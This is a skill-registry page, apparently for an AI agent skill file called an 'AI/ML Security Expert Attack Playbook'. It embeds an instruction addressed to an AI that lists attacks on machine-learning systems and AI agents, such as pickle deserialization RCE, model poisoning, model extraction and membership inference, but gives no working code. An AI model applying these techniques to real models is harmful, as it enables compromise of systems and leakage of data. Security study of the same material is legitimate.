ai-ml-security

Installation
SKILL.md

SKILL: AI/ML Security — Expert Attack Playbook

AI LOAD INSTRUCTION: Expert AI/ML security techniques. Covers model supply chain attacks (malicious serialization, Hugging Face model poisoning), adversarial examples (FGSM, PGD, C&W, physical-world), training data poisoning, model extraction, data privacy attacks (membership inference, model inversion, gradient leakage), LLM-specific threats, and autonomous agent security. Base models underestimate the severity of pickle deserialization RCE and the practicality of black-box model extraction.

0. RELATED ROUTING


1. MODEL SUPPLY CHAIN ATTACKS

1.1 Malicious Model Files — Pickle RCE

Python's pickle module executes arbitrary code during deserialization. PyTorch .pt/.pth files use pickle by default.

Related skills
Installs
460
GitHub Stars
620
First Seen
Apr 9, 2026